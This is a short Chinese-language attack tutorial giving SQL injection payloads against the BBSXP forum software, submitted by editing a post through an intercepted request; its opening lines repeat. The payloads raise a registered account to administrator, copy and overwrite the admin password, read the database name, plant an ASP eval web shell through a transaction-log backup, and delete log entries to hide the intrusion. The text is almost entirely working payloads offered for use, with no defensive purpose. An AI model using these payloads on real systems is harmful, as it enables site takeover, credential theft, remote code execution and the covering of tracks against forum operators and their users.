芊芊做的教程
这里记录一下:
注册---->发帖---->编辑(抓包提交)
define:cnsapc为注册用户
bug为帖子内容
这里记录一下:
注册---->发帖---->编辑(抓包提交)
define:cnsapc为注册用户
bug为帖子内容
提升为管理员:
&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'--
获取后台密码"
&cnsapc=bug','');update bbsxp_users set usermail=(select adminpassword from bbsxp_sitesettings) where username='cnsapc'--
修改后台密码:
&cnsapc=bug','');update bbsxp_sitesettings set adminpassword='md5密码'-- 注意:bbsxp经过md5加密的密码字母都是大写的
获得数据库名:
&cnsapc=bug','');update bbsxp_users set usermail=db_name() where username='cnsapc'--
log备份拿webshell:
&alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--
清除日志:
&delete * from bbsxp_log where username='cnsapc'--
